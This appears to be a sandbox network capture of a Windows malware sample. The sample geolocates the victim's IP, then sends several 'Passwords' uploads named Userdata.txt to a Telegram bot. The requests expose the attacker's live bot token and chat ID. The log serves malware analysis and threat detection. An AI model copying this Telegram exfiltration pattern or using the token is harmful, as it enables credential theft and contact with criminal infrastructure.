2025-01-10 21:43:27 UTC	1324	IN	Data Raw: a5 52 76 f0 b8 db 26 ec 17 68 fa 92 85 b2 8e d5 37 40 a8 c1 bc 2e 5f aa d0 c4 2b aa 3c ff bd c2 41 08 e0 39 38 a2 39 3f a5 b8 10 c3 c9 75 69 c5 cb a4 2f 89 ea d2 22 23 56 29 e1 a5 08 59 79 70 b3 5d c2 24 84 db 20 d5 99 5a b2 f0 81 6c f3 95 71 e8 7a a2 22 ca c5 db c4 06 dc 38 dc 21 c8 84 a1 a5 ab 08 bd 86 d9 f5 8b 2a f8 88 ed ce a9 4d 2e 77 37 10 14 19 fc 38 33 e2 bc e0 34 fc 63 2f e3 24 77 ff 72 30 1d 49 ae 99 82 05 b5 93 6c 62 78 86 54 87 d9 79 7c 97 31 d0 69 18 20 e3 67 8b ac ed 59 2c f9 9b ab 0e ce 52 bf 53 31 9b 2f d6 3b 16 64 29 e6 71 38 0f 32 33 29 0d 58 0c 0b 80 c6 08 35 7a ef 4e 1c 84 a4 bd de 33 eb 40 7a c2 b1 a5 21 7a 96 a5 17 09 c4 38 90 36 58 ed df 91 11 ac a7 57 b8 6a 0a 2f 73 c5 31 3e c3 01 8f 76 7c ba d9 5b 71 e1 c6 c3 13 1d 9b 42 02 1a 4c Data Ascii: Rv&h7@._+<A989?ui/"#V)Yyp]$ Zlqz"8!*M.w7834c/$wr0IlbxTy\|1i gY,RS1/;d)q823)X5zN3@z!z86XWj/s1>v\|[qBL
2025-01-10 21:43:27 UTC	1390	IN	Data Raw: 01 10 f1 99 ec ee 9a 1e c2 bc d3 f6 d1 2b 6b 22 ef f7 54 3a 1f f8 07 7a 5d 89 f6 7d 29 aa f6 52 1a cd f2 95 aa e7 22 85 96 a7 36 d7 9d 61 34 18 5e c8 c9 00 a0 f8 0d d2 91 99 00 7b c0 9b 00 e9 a8 65 ee 01 6d c7 d8 08 f7 22 8a ca 77 21 c0 a6 00 7f dd aa d2 8e ee 5f c7 c1 91 c8 21 0d 41 58 71 ff 20 1b 80 61 7a af f6 5d e2 37 b5 72 bf 24 8c ee bb 29 4c 27 52 11 fe 09 8c df 2c 7b 34 16 66 ae c4 94 71 28 fa 96 6b b4 b0 78 99 ea b8 7d 6b bb dd 4b 8b f3 da 03 fe 4d 73 ef 92 ff 6d e1 c2 45 a2 b8 d7 ce f7 30 b2 a2 c2 3f d1 07 5d 98 df 1b c4 f6 39 42 00 37 2e 38 d5 77 03 58 75 6d c6 ec c9 1c 57 ea d6 00 80 6c 3f eb a8 2b 86 79 74 b9 ff cd 33 fa 05 33 e5 91 28 c5 e6 81 1c b8 4a 71 f9 70 02 7c 94 bb 05 c0 78 85 4a 38 3c e0 a0 ce 7a a1 02 b1 37 f8 fd f1 d8 f5 8a 9c fa Data Ascii: +k"T:z]})R"6a4^{em"w!_!AXq az]7r$)L'R,{4fq(kx}kKMsmE0?]9B7.8wXumWl?+yt33(Jqp\|xJ8<z7
2025-01-10 21:43:27 UTC	1390	IN	Data Raw: a0 d0 8b a1 df 39 bc 78 ec 8b 5f c4 a3 05 2b 86 8b c6 9f f5 3c ba a2 f4 b6 3b ea 68 83 2c 7c 2f 3f 14 a4 28 f1 32 ed d5 01 c2 64 18 88 72 d1 46 19 b0 35 80 63 cb 60 45 b3 d0 40 5a ad ca 36 10 eb 2b 4a dc 78 3c 87 d7 6c b1 e9 dc af 6c 47 02 c8 2a 8a fd fb 2f e1 cd 18 72 ba d1 5b c8 14 e2 e8 28 eb 6d 1a 04 d8 08 80 92 2a 2e bb 92 e6 2e c5 94 08 6c e7 28 a5 25 96 3c 34 dd a4 34 68 fc 1e 68 13 b7 e3 09 c5 f6 87 19 57 c2 9c 17 d9 e6 4e eb 0b fa db c0 08 e2 31 8f 12 4c e6 d6 b5 11 54 ee b9 d7 a3 6e 95 d9 c8 02 29 17 30 56 49 7e 81 3a 8a 9f 14 55 7d e7 62 f1 2c 24 47 83 ca 8d f8 47 28 7a 26 3e 95 e2 17 90 cc 31 6a 32 1f 95 af 8e 97 60 3e c5 88 7a b1 a1 10 d1 c2 7c 77 60 ab 43 6b 9a ed c9 39 c0 fa b9 fa 98 a7 81 c4 d5 3d 57 bb a5 5c 50 15 da c3 e0 38 c7 05 7d a7 Data Ascii: 9x_+<;h,\|/?(2drF5c`E@Z6+Jx<llG/r[(m..l(%<44hhWN1LTn)0VI~:U}b,$GG(z&>1j2`>z\|w`Ck9=W\P8}
2025-01-10 21:43:27 UTC	1390	IN	Data Raw: 53 3a d4 b0 06 ca 53 21 30 25 ae 4f cd b2 8b 21 76 cc 27 c8 a2 a2 02 90 2d 0c 3a fd f4 05 f1 d7 d3 a0 e5 06 2b 15 d0 05 99 bb 55 f5 de b9 d5 2c 5b 45 0d 4d 95 29 ba d3 20 a1 b5 a6 4b 02 0e 92 57 9d bc bd 30 1d e8 76 26 8f 38 33 36 e2 ac c0 25 9d b2 d8 06 7d 80 ec 8b 44 e0 49 08 b1 9f 96 d1 80 80 bd 46 a2 fe af 27 f3 4d d1 33 06 10 5b 14 d4 4d 32 08 ed df 1c 07 02 e6 81 06 46 55 09 a0 28 f8 26 db 0f c8 9b 9e 4a 49 ac c8 2c 12 f6 23 35 00 61 2d 87 ab 80 a0 fb b9 49 03 b8 08 7f 33 f6 ec e9 38 31 f2 a4 ff e3 db 57 c9 07 f6 ef 33 91 9f f8 01 d2 6b 9e 95 36 11 1a 58 e7 2e de 8e eb 6c e7 23 af 39 93 22 d0 ec 74 34 69 93 e1 69 00 aa f2 c2 de 61 ff 1b a1 d3 50 13 17 6b 3c ee 0b ec db df 00 e8 33 9f de 57 72 a9 bd d0 44 be bb d7 a9 7f 81 d9 d4 87 20 1f e6 41 58 60 Data Ascii: S:S!0%O!v'-:+U,[EM) KW0v&836%}DIF'M3[M2FU(&JI,#5a-I381W3k6X.l#9"t4iiaPk<3WrD AX`
2025-01-10 21:43:27 UTC	1390	IN	Data Raw: 2a 89 1f 7a d2 44 28 b9 5b 1d ec 0d cb ee c1 84 25 ad 79 ae 37 eb 44 dd 6c 4a e5 51 49 ec b9 e3 cd c1 fc 11 39 a2 50 eb 54 71 2a e3 65 6b 1d 8f 40 68 bb ad 2e 68 f8 16 f7 81 cd 4e db 7f 48 94 2f 87 86 cd 58 c2 86 9a da 4f 4f 7c 26 38 68 44 2a e6 8c 02 ca 45 23 0a 22 da 0d d1 b2 e0 7e a5 cc 35 cf af aa 22 97 5f 63 26 ff f6 a2 3f d7 a3 8e b8 02 23 0e dc 61 88 fe 55 85 b0 60 d2 04 a5 56 08 56 86 ff 28 de 29 b4 a3 bf 5f 26 2b c5 42 b1 bf 84 ed 17 87 72 27 fd d0 47 33 93 b2 b9 f4 09 b2 d2 07 46 73 fd 82 5a 36 b3 1b bb 84 8f c1 6f 87 c1 b1 b3 f5 89 22 d3 cc 92 22 04 6e 20 7b 8b 47 1a 38 fc d6 3e 81 0b f7 8e 61 de 55 09 a1 10 d2 37 f9 ca 35 9b 94 48 4b a0 ab bb 1d fa 42 56 f9 78 3c 8b ab 21 a0 fb b9 76 d0 47 08 79 2a 9c ec f9 3c 49 38 cb ff 93 c7 73 48 07 f6 f4 Data Ascii: zD([%y7DlJQI9PTqek@h.hNH/XOO\|&8hDE#"~5"_c&?#aU`VV()_&+Br'G3FsZ6o""n {G8>aU75HKBVx<!vGy<I8sH
2025-01-10 21:43:27 UTC	1390	IN	Data Raw: 61 1e 9c 6d 58 ef ef 2c 6f 53 b5 e0 4f ed 45 35 ec 77 d2 36 24 cd 94 a3 c8 97 03 0f 44 b8 d3 81 3c d8 53 f2 7e b0 0e 4e 4d 91 a9 23 98 96 66 9a 80 38 cf bc 5d 42 e3 18 97 f3 83 7b cf af f8 fa 27 07 c6 1d e0 f7 cc a7 fb 5a 88 f6 b5 b0 65 4e 89 37 d1 c9 74 26 b1 36 1b 9e 91 e4 ee b1 fa f0 b2 65 80 80 b4 44 d7 14 42 44 51 39 c2 e4 e6 cd da f2 63 dd 8f a8 9b 42 53 a0 e4 5c 27 0a 71 43 7f cd 08 cc 6d fe 6a e9 db 16 52 db 05 31 b8 2c d8 93 e7 41 a1 79 d7 c7 c4 67 a6 35 3f 5b 41 5f 38 8f 03 ba e7 0e 0c 2c 0a 40 d5 c0 bc 04 70 bc 97 ec bb b3 37 32 08 07 48 b9 93 cd 9a 75 86 93 ba 03 89 3a c7 61 3a c2 55 85 7d 9d 72 04 a3 4f 1e 4a fd d8 bb de 2d a3 bd 9f 00 2e 07 8c c4 96 bc 85 e9 1d e8 67 21 ea 0c 3b 31 83 b5 a2 da a3 52 2c fe aa 7a ec 55 5e ed 9a 3b b1 95 8f c4 Data Ascii: amX,oSOE5w6$D<S~NM#f8]B{'ZeN7t&6eDBDQ9cBS\'qCmjR1,Ayg5?[A_8,@p72Hu:a:U}rOJ-.g!;1R,zU^;
2025-01-10 21:43:27 UTC	1390	IN	Data Raw: b7 8c e5 a7 04 c2 f1 3c 1a 25 6b 20 4a ac 40 b3 02 3e 41 b5 65 75 a3 aa 4d 85 7b 68 88 c3 a0 5a 8d b8 9a 17 57 4c d5 b0 60 f8 22 ea 9d 54 2c 50 65 70 58 3c 15 a9 f6 9e 5c ea 67 af c3 5e d3 55 87 92 86 74 b5 39 ee c3 88 d7 a5 87 7f ee 67 70 1b be ed 55 91 e6 3f 67 46 ac c1 24 a5 6d 36 e7 f7 d7 59 20 c8 94 a9 b6 95 15 d9 5d 97 56 86 2d d8 7e 1b 91 46 e5 b0 4c 5c b3 17 ba b3 98 9b 99 20 d0 b7 59 06 cb b2 9d 2d 89 6a e0 81 bb fa 27 0d d7 14 c8 71 cc a7 fd 1e 8c f6 b5 da 4f 6e 89 0f 7b c9 74 68 b9 27 1d f7 3d fc ee bd 94 25 b2 56 86 ef fa 44 c8 02 42 20 51 39 ce 85 d0 ee cb 86 39 71 8a a8 e1 5e 7b 27 cc a4 2d 1c 85 4b 69 f1 3c 2f 68 fe 1c 8c 24 97 52 dd 03 2f 34 75 9b 80 9b 3f 7f 55 9a dc 6f 50 c9 e6 3e 7e 51 3a 04 88 05 dc 56 2c 23 32 a9 65 cd ba 81 16 02 a4 Data Ascii: <%k J@>AeuM{hZWL`"T,PepX<\g^Ut9gpU?gF$m6Y ]V-~FL\ Y-j'qOn{th'=%VDB Q99q^{'-Ki</h$R/4u?UoP>~Q:V,#2e
2025-01-10 21:43:27 UTC	1390	IN	Data Raw: 38 54 62 77 64 fe 77 a6 0e 93 0c c5 5f 22 61 dd a7 7c 11 88 1c d8 ce d2 39 23 93 b9 78 ff c0 aa 1b 1b 8d e1 3b 68 36 29 cf d5 6f 82 b0 58 92 f4 9d 5b 1e 08 82 77 78 79 e0 4f fd cd 27 3d cb b1 64 d0 3d 40 92 63 5a 88 91 39 9c da c5 11 76 0f 8e f4 a2 70 53 23 3c 6a 35 4f a9 38 f6 56 a5 8c 52 cc a6 69 62 89 8e 6f 4b f6 57 8e d4 7b 6c 9d dc 6f 04 6f 2b 76 95 77 f9 91 c8 f7 4e 1c 45 15 6f 2f 19 0c be ff 34 68 f7 67 97 ca 5e d3 98 77 89 97 77 04 18 fa a0 44 87 39 eb dd b6 a8 a5 1b b4 f8 4b ea f8 3a 4f d1 bd cc 0a f8 65 27 e5 5b 9b 5f 08 cf 95 a9 ad fd 06 0e 4e 9a 28 84 3d de 4a d3 fb b9 1a b6 5f 8b b2 3b 86 7e 99 88 99 22 d4 a1 8f 55 d8 b9 86 f8 a5 7c e2 6a a7 fa 2d 1c d2 7b 97 62 cc ad ec 40 a5 63 b5 b0 48 7d 8c 1f 7b c9 5f 0c b9 0f b6 ec 0d f2 e6 d0 92 57 2e Data Ascii: 8Tbwdw_"a\|9#x;h6)oX[wxyO'=d=@cZ9vpS#<j5O8VRiboKW{loo+vwNEo/4hg^wwD9K:Oe'[_N(=J_;~"U\|j-{b@cH}{_W.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49921	104.21.80.1	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:43:31 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1860200 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAizYeIZDYC4tXdCnCFizFhLXI96Kp3IAfTmx29yCdxEqAaekobaTURtGJ45SzXW1T98CByt7kHlB0GjInRHJwpZdGfgYVqmENvt6jrusW7nQqmLxE8QMu3BDzTafT1Rjv%2FSWUxe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffd7d44fe97d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1977&rtt_var=749&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1454907&cwnd=244&unsent_bytes=0&cid=8ca92d1b18bb0539&ts=152&x=0"
2025-01-10 21:43:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49964	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:37 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3195ed612844 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:43:37 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 35 65 64 36 31 32 38 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3195ed612844Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:38 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:38 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43621,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545418,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49978	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:39 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31af086f28d9 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:43:39 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 66 30 38 36 66 32 38 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31af086f28d9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:40 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:40 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43622,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545420,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49989	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:41 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31c547a1f7ec Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:41 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 35 34 37 61 31 66 37 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31c547a1f7ecContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:42 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:42 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43623,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545422,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49992	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:43 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31db740fc421 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:43 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 62 37 34 30 66 63 34 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31db740fc421Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:44 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
